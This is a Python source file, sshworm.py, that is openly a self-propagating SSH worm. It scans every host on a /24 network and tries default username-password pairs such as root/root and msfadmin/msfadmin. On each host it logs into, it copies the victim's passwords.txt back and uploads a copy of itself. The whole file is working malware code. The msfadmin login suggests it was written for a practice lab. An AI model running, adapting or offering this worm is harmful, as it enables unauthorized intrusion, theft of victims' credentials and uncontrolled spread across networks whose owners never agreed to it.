sshworm.py

1. #!/usr/bin/env python3
2.  
3. """ Implementation of simple worm that spreads via SSH connection.
4. """
5.  
6. import logging
7. import paramiko
8. import scp
9. import sys
10.  
11.  
12. class Worm:
13.     """ This class represents implementation of worm that spreads via SSH
14.    connections.
15.    """
16.  
17.     def __init__(self, network_address):
18.         self._network = network_address
19.  
20.     @property
21.     def network(self):
22.         """ Network, on which the worm spreads. """
23.         return self._network
24.  
25.     @network.setter
26.     def network(self, new_network):
27.         self._network = new_network
28.  
29.     @property
30.     def credentials(self):
31.         """ Possible SSH credentials of the victim. """
32.         return (
33.             ('user', 'user'),
34.             ('root', 'root'),
35.             ('msfadmin', 'msfadmin')
36.         )
37.  
38.     def generate_addresses_on_network(self):
39.         """ Generate addresses of hosts on the given network.
40.        For simplicity is expected the following mask:
41.        255.255.255.0
42.        """
43.         network = self.network.split('.')
44.         for host in range(1, 256):
45.             network[-1] = str(host)
46.             yield '.'.join(network)
47.  
48.     def spread_via_ssh(self):
49.         """ Spread the worm on the network via SSH connections.
50.        To establish SSH connection try selected user-password
51.        combinations. When the connection is established, copy
52.        the worm to the remote host.
53.        """
54.         # Setup SSH client.
55.         ssh = paramiko.SSHClient()
56.         ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
57.  
58.         for remote_address in self.generate_addresses_on_network():
59.             logging.debug('Trying to spread on the remote host: {}'.format(remote_address))
60.             print()
61.  
62.             for user, passw in self.credentials:
63.                 try:
64.                     ssh.connect(remote_address, port=22, username=user, password=passw, timeout=10)
65.                     logging.debug('The worm is succesfully connected to the remote host [{}, {}].'.format(user, passw))
66.  
67.                     # Create SCP client for file transmission.
68.                     with scp.SCPClient(ssh.get_transport()) as scp_client:
69.                         # Obtain file with victim's passwords.
70.                         try:
71.                             scp_client.get('passwords.txt')
72.                             logging.debug('The victim had passwords.txt')
73.                         except Exception:
74.                             logging.debug('The victim did not have passwords.txt')
75.  
76.                         # Upload worm to the remote host.
77.                         try:
78.                             scp_client.put(sys.argv[0])
79.                             logging.debug('The worm has been uploaded to victim')
80.                         except Exception:
81.                             logging.debug('The worm could not be uploaded to victim')
82.  
83.                     print()
84.                 except Exception:
85.                     logging.debug('The remote host refused connection with credentials {},{}.'.format(user, passw))
86.                     print()
87.  
88.         ssh.close()
89.  
90. if __name__ == '__main__':
91.     logging.basicConfig(level=logging.DEBUG)
92.     # Disable basic logging of paramiko to make log easier to read.
93.     logging.getLogger('paramiko').setLevel(logging.CRITICAL)
94.  
95.     # Initialize worm with the network address.
96.     worm = Worm('198.168.0.0')
97.     # Spread via SSH connection on the network.
98.     worm.spread_via_ssh()